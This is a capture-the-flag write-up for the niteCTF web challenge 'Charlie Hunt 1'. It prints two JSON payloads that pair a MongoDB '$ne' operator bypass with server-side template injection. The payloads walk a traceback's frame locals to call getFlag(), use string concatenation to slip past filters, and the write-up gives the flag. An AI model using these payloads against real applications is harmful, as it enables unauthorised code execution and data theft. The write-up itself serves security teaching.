niteCTF web/Charlie Hunt 1

Challenge overview

The challenge presents a web application with an API endpoint /api/v1/review that accepts POST requests. The goal is to exploit a template injection vulnerability to retrieve a flag.

Analysis

1. Endpoint /api/v1/review accepts JSON data with two key fields:
   • stars: contains a MongoDB bypass operator {"$ne": null}
   • __v: contains the template injection payload

Exploitation

There are two successful approaches:

1. Method discovery

   {
     "stars": {"$ne": null},
     "__v": "{{ e|attr('__traceback__')|attr('tb_frame')|attr('f_locals')|attr('get')('self')|attr(('__c' ~ 'la' ~ 'ss__'))|attr(('__d' ~ 'i' ~ 'ct__'))|attr('keys')() }}"
   }
   

2. Direct flag retrieval

   {
     "stars": {"$ne": null},
     "__v": "{{ e|attr('__traceback__')|attr('tb_frame')|attr('f_locals')|attr('get')('self')|attr('getFlag')() }}"
   }
   

The exploit works by:

• using an error object e to access the traceback
• traversing through the frame locals to get the self reference
• calling the getFlag() method or listing available methods

Flag:
nite{3rror5_can_b3_u53ful_s0m3t1m35}

Key takeaways

1. Error messages can be leveraged for SSTI exploitation.
2. Template engines that expose internal Python attributes are particularly vulnerable.
3. Using attribute concatenation (~) can help bypass potential filters.